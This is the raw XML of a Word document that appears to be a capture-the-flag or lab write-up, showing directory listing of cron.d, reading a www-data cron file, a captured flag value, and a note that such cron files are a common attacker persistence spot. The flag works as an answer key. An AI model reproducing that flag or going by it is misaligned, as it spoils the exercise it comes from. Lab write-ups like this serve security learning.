    <w:p w14:paraId="6A7D9BC5" w14:textId="0196173B" w:rsidR="00A50A00" w:rsidRDefault="00307D13">
      <w:r>
        <w:t>Cd cron.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D997310" w14:textId="7B379267" w:rsidR="00307D13" w:rsidRDefault="00307D13">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B528726" w14:textId="54944284" w:rsidR="00307D13" w:rsidRDefault="00307D13">
      <w:r>
        <w:t>Cat www-data-cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B385375" w14:textId="2AA855DA" w:rsidR="00307D13" w:rsidRDefault="00307D13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16F24A77" wp14:editId="79B1A340">
            <wp:extent cx="5943600" cy="621665"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="2227274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7493" name="Picture 2227274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F63B" w14:textId="1DC20396" w:rsidR="00307D13" w:rsidRDefault="00307D13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00307D13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LAG4_4e5cc6810c6f40008de2f14e16fcf93e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D3F20" w14:textId="63927DBD" w:rsidR="00307D13" w:rsidRDefault="00307D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EEA7A3" wp14:editId="2A4E73A5">
            <wp:extent cx="4337273" cy="952549"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1419828438" name="Picture 2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28438" name="Picture 29" descr="A black background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1AE7" w14:textId="77777777" w:rsidR="00307D13" w:rsidRDefault="00307D13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CDB3BE" w14:textId="0C1AC023" w:rsidR="00307D13" w:rsidRDefault="00307D1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49A779" wp14:editId="47797C0E">
            <wp:extent cx="4349974" cy="4019757"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20918150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5045" name="Picture 20918150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75A5" w14:textId="40EAC909" w:rsidR="007646F7" w:rsidRDefault="007646F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F876CD" w14:textId="67EBDA90" w:rsidR="007646F7" w:rsidRPr="007646F7" w:rsidRDefault="007646F7">
      <w:r w:rsidRPr="007646F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>www-data-cron</w:t>
      </w:r>
      <w:r w:rsidRPr="007646F7">
        <w:br/>
        <w:t xml:space="preserve">A cron file whose name suggests it either </w:t>
      </w:r>
      <w:r w:rsidRPr="007646F7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>runs tasks as the www-data user</w:t>
      </w:r>
      <w:r w:rsidRPr="007646F7">
        <w:t xml:space="preserve"> (the typical webserver user) or contains jobs relevant to web services. This could be entirely benign (created by a package or admin), but it’s also a common place an attacker might drop a scheduled job if they have write access.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007646F7" w:rsidRPr="0076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3455"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB1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52928"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="237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674886">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1257401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B4"/>
    <w:rsid w:val="001B5CF4"/>
    <w:rsid w:val="002A62B4"/>
    <w:rsid w:val="00307D13"/>
    <w:rsid w:val="003A56D4"/>
    <w:rsid w:val="003E7325"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00673287"/>
    <w:rsid w:val="00712F97"/>
    <w:rsid w:val="007646F7"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00980E9E"/>
    <w:rsid w:val="00A50A00"/>
    <w:rsid w:val="00D8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313F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{04706A25-EB03-421B-81EB-6CCDD937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2025-10-09T04:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-09T05:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>